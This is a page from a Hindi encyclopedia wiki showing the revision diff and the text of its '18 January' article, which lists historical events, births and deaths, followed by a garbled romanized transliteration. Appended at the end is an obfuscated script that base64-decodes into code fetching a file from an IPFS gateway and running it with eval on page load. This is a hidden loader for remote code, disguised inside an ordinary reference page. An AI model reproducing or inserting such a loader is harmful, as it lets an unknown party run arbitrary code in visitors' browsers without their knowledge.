Difference between revisions of "18 जनवरी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 4: Line 4:
  
 
==18 जनवरी की महत्त्वपूर्ण घटनाएँ==
 
==18 जनवरी की महत्त्वपूर्ण घटनाएँ==
*[[2008]]- मुख्यमंत्री [[मायावती]] की अध्यक्षता में हुई कैबिनेट की बैठक में निजी विश्वविद्यालय खोलने के लिए दिशा-निर्देशों की मंजूरी प्रदान की गायी।
+
*1701 - ब्रैडनबर्ग के फ्रेडरिक तृतीय प्रशिया की गद्दी पर बैठे।
*[[2009]]- द्वितीय प्रशासनिक सुधार आयोग ने अपनी सिफ़ारिशें सरकार को पेश कीं। [[सौरभ गांगुली]] को बंगाल क्रिकेट एसोसिएशन ने सोने के बैट से सम्मानित किया।  
+
*1782 - अमेरिकी राजनेता डेनियल वेब्सटर का जन्म हुआ।
 +
*[[1952]] - [[मिस्र]] में [[ब्रिटेन]] विरोधी दंगे भड़के।
 +
*[[1963]] - [[फ्रांस]] ने यूरोपीय साझा बाज़ार से ब्रिटेन को अलग करने की वकालत की।
 +
*[[1968]] - [[अमेरिका]] और सोवियत संघ परमाणु हथियारों पर नियंत्रण के लिए एक संधि के प्रारूप पर सहमत हुए।
 +
*[[1973]] - अमेरिका और उत्तर वियतनाम में शांति समझौते का पाठ तैयार करने के लिए वार्ताकारों की बैठक शीघ्र होने की घोषणा की।
 +
*[[1976]] - फ्रांस ने जासूसी के आरोप में 40 सोवियत अधिकारियों को देश से निष्कासित किया।
 +
*[[1986]] - दक्षिण यमन की राजधानी अदन में जबरदस्त संघर्ष शुरू होने पर विदेशी नागरिक भागने लगे।
 +
*[[1987]] - [[लंदन]] में प्रचार माध्यमों के 40 देशों के प्रतिनिधियों की हुई बैठक में सेंसरशिप के ख़िलाफ़ एकजुट होकर संघर्ष की घोषणा की गई।
 +
*[[1989]] - चेकोस्लोवाकिया में लाखों लोगों ने आज़ादी सच्चाई और मानवाधिकार के समर्थन में प्रदर्शन किया।
 +
*1[[997]] - 'नफीसा जोसेफ़' 'मिस इंडिया' बनीं।
 +
*[[2004]] - [[भारत]] ने [[क्रिकेट]] की एकदिवसीय श्रृंखला में [[आस्ट्रेलिया]] को 19 रनों से हराया।
 +
*[[2005]] - [[सुप्रीम कोर्ट]] ने सांसदों को पेट्रोल पम्प आवंटित नहीं करने की सिफ़ारिश की।
 +
*[[2008]] - मुख्यमंत्री [[मायावती]] की अध्यक्षता में हुई कैबिनेट की बैठक में निजी [[विश्वविद्यालय]] खोलने के लिए दिशा-निर्देशों की मंजूरी प्रदान की गयी।
 +
*[[2009]] -  
 +
**'द्वितीय प्रशासनिक सुधार आयोग' ने अपनी सिफ़ारिशें सरकार को पेश कीं।  
 +
**[[सौरभ गांगुली]] को 'बंगाल क्रिकेट एसोसिएशन' ने सोने के बैट से सम्मानित किया।  
 +
 
 +
 
 
==18 जनवरी को जन्मे व्यक्ति==
 
==18 जनवरी को जन्मे व्यक्ति==
*[[1927]] - [[सुन्दरम बालचंद्रन]] - [[वीणा]] वादक (मृत्यु - 1990)
+
*1841 - [[महाराष्ट्र]] के विद्वान 'महादेव गोविन्द रानाडे' का जन्म हुआ।
 +
*[[1927]] - [[सुन्दरम बालचंद्रन]] - [[वीणा]] वादक / मृत्यु - 1990।
 +
*[[1942]] - मुक्केबाज़ मुहम्मद अली का जन्म हुआ।
 
*[[1972]] - [[विनोद काम्बली]] - क्रिकेट खिलाड़ी
 
*[[1972]] - [[विनोद काम्बली]] - क्रिकेट खिलाड़ी
 
*[[1985]] - मिनिषा लांबा - बालीवुड [[अभिनेत्री]]
 
*[[1985]] - मिनिषा लांबा - बालीवुड [[अभिनेत्री]]
  
 
==18 जनवरी को हुए निधन==
 
==18 जनवरी को हुए निधन==
*[[2003]] [[हरिवंश राय बच्चन]] - [[हिन्दी भाषा]] के प्रसिद्ध कवि और लेखक
+
*[[1947]] - प्रसिद्ध भारतीय गायक और [[अभिनेता]] [[कुंदन लाल सहगल]] का निधन [[जालंधर]] में हुआ।
*[[1996]] [[एन टी रामाराव]] - राजनीतिज्ञ और अभिनेता
+
*[[1996]] [[एन.टी. रामाराव]] - राजनीतिज्ञ और अभिनेता।
*[[1947]] [[कुन्दन लाल सहगल]]- भारतीय गायक और [[अभिनेता]]
+
*[[2003]] [[हरिवंश राय बच्चन]] - [[हिन्दी भाषा]] के प्रसिद्ध कवि और लेखक का निधन।
 
 
 
==18 जनवरी के महत्त्वपूर्ण अवसर एवं उत्सव==
 
==18 जनवरी के महत्त्वपूर्ण अवसर एवं उत्सव==
  

Revision as of 13:08, 30 January 2012


gregori kailandar ke anusar 18 janavari varsh ka 18 vaan din hai. sal mean abhi aur 347 din shesh haian. (lip varsh mean 348 din)

18 janavari ki mahattvapoorn ghatanaean

  • 1701 - braidanabarg ke phredarik tritiy prashiya ki gaddi par baithe.
  • 1782 - ameriki rajaneta deniyal vebsatar ka janm hua.
  • 1952 - misr mean briten virodhi dange bh dake.
  • 1963 - phraans ne yooropiy sajha bazar se briten ko alag karane ki vakalat ki.
  • 1968 - amerika aur soviyat sangh paramanu hathiyaroan par niyantran ke lie ek sandhi ke praroop par sahamat hue.
  • 1973 - amerika aur uttar viyatanam mean shaanti samajhaute ka path taiyar karane ke lie vartakaroan ki baithak shighr hone ki ghoshana ki.
  • 1976 - phraans ne jasoosi ke arop mean 40 soviyat adhikariyoan ko desh se nishkasit kiya.
  • 1986 - dakshin yaman ki rajadhani adan mean jabaradast sangharsh shuroo hone par videshi nagarik bhagane lage.
  • 1987 - landan mean prachar madhyamoan ke 40 deshoan ke pratinidhiyoan ki huee baithak mean seansaraship ke khilaf ekajut hokar sangharsh ki ghoshana ki gee.
  • 1989 - chekoslovakiya mean lakhoan logoan ne azadi sachchaee aur manavadhikar ke samarthan mean pradarshan kiya.
  • 1997 - 'naphisa josef' 'mis iandiya' banian.
  • 2004 - bharat ne kriket ki ekadivasiy shrriankhala mean astreliya ko 19 ranoan se haraya.
  • 2005 - suprim kort ne saansadoan ko petrol pamp avantit nahian karane ki sifarish ki.
  • 2008 - mukhyamantri mayavati ki adhyakshata mean huee kaibinet ki baithak mean niji vishvavidyalay kholane ke lie disha-nirdeshoan ki manjoori pradan ki gayi.
  • 2009 -
    • 'dvitiy prashasanik sudhar ayog' ne apani sifarishean sarakar ko pesh kian.
    • saurabh gaanguli ko 'bangal kriket esosieshan' ne sone ke bait se sammanit kiya.


18 janavari ko janme vyakti

18 janavari ko hue nidhan

18 janavari ke mahattvapoorn avasar evan utsav

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>